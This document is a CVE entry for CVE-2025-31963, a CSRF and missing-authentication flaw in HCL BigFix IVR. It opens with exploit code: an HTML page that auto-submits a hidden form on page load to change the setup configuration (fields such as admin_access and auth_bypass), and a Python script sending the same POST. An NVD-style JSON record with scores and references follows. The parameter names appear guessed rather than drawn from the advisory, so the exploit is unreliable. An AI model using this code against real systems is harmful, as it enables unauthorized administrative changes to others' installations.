CVE-2025-31963

<!-- CSRF PoC for CVE-2025-31963 --> <!-- This PoC demonstrates the CSRF vulnerability in HCL BigFix IVR --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-31963</title> </head> <body> <h1>CVE-2025-31963 CSRF PoC</h1> <p>This PoC demonstrates the missing CSRF protection in HCL BigFix IVR local setup interface.</p> <!-- Malicious configuration change request --> <form id="csrfForm" action="https://target-server/ivr/setup/configure" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="action" value="update_config"> <input type="hidden" name="config_param" value="admin_access"> <input type="hidden" name="config_value" value="enabled"> <!-- Other malicious configuration parameters --> <input type="hidden" name="auth_bypass" value="true"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>If you see this message, the request has been sent.</p> </body> </html> <!-- Python PoC for testing authentication bypass --> ''' import requests import json TARGET_URL = "https://target-server/ivr/setup/configure" PAYLOAD = { "action": "update_config", "config_param": "admin_access", "config_value": "malicious_value", "auth_bypass": "true" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } response = requests.post(TARGET_URL, data=PAYLOAD, headers=headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") '''

{"cve": {"id": "CVE-2025-31963", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:01.863", "lastModified": "2026-01-22T13:45:28.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper authentication and missing CSRF protection in the local setup interface component in HCL BigFix IVR version 4.2 allows a local attacker to perform unauthorized configuration changes via unauthenticated administrative configuration requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.3, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-352"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_insights_for_vulnerability_remediation:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "0CDB58BE-0D8B-4F78-8D21-0B9B70D2B5A0"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}